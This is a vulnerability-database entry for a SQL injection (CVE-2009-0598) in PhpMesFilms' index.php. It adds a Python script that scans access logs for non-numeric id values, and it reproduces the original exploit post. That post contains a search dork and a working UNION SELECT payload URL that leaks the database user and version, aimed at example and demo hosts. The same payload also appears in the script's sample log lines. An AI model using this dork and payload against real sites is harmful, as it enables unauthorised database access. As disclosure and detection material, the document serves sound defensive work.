PhpMesFilms 'index.php' SQL Injection Vulnerability

Vulnerability ID 1117190 Vulnerability type SQL injection
Published 2009-01-04 Updated 2009-02-17
CVE ID CVE-2009-0598 CNNVD-ID CNNVD-200902-360
Platform PHP CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/7660
https://cxsecurity.com/issue/WLB-2009020197
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-360
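|Vulnerability details
PhpMesFilms is a video library management script. A SQL injection vulnerability exists in index.php in PhpMesFilms versions 1.0 and 1.8. Remote attackers can execute arbitrary SQL commands via the id parameter.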
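A log check for requests that abuse the id parameter of index.php, as an added example that is not part of the advisory or of PhpMesFilms. It assumes id is meant to be a plain numeric record id and that the web server writes Apache-style access logs; the log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jan/2009:10:00:01 +0000] "GET /script/index.php?id=3 HTTP/1.1" 200 5120
203.0.113.9 - - [04/Jan/2009:10:00:07 +0000] "GET /script/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10-- HTTP/1.1" 200 5310
203.0.113.9 - - [04/Jan/2009:10:00:09 +0000] "GET /script/index.php?id=3%20UNION%20SELECT%201 HTTP/1.1" 200 5310
198.51.100.2 - - [04/Jan/2009:10:01:00 +0000] "GET /script/index.php HTTP/1.1" 200 4000
198.51.100.2 - - [04/Jan/2009:10:01:02 +0000] "GET /script/style.css?id=x HTTP/1.1" 200 800
"""

# client, timestamp and request target from a common/combined log line
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"'
)
# Assumption: a legitimate id is a short ASCII integer.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def suspicious_id_requests(log_text):
    """Return (client, timestamp, decoded id) for index.php hits with a non-numeric id."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs decodes '+' and %xx, so encoded variants are compared in clear text
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((client, when, value))
    return hits


if __name__ == "__main__":
    for client, when, value in suspicious_id_requests(SAMPLE_LOG):
        print(f"{when} {client} non-numeric id: {value!r}")
```

The same allow-list (integer only) is the input check the application should enforce before the value reaches a query, alongside parameterized statements.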
|Exploit
[~] in the name of God
[~]
[~] Download script : http://www.script-masters.com/home/download.php?script=138
[~]
[~]----------------------------------------------------------
[~] Discovered By: SuB-ZeRo(from algeria)   msn: FbH@hotmail.com
[~]
[~] D-unit : SuB-ZeRo & Me!sTer & HaLokA
[~]
[~] Home: www.dz-security.net/ my exploit : www.dz-security.net/subzero
[~]
[~] N0T: We ArE MoUsLiMme WiThE GaZa 4 ever
[~] -----------------------------------------------------------
dork : powered by PhpMesFilms
Exploit:
http://www.sit.com/script/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
---------------------------------------------------------------------------------------------
L!Ve DeMo:
http://phpmesfilms.dyndns.org/demo/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
 not : in this script some times version is 4 and some times is 5 have nice day
[~]----------------------------------------------------------------------
[~] Greetz tO: Me!sTer & HaLoKa & MaXi32 & Dz-TeAm and all algeria & gaza
[~] we are D-unit www.dz-security.net
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-04]
|References

Source: BID
Name: 33105
Link: http://www.securityfocus.com/bid/33105
Source: MILW0RM
Name: 7660
Link: http://www.milw0rm.com/exploits/7660
Source: SECUNIA
Name: 33332
Link: http://secunia.com/advisories/33332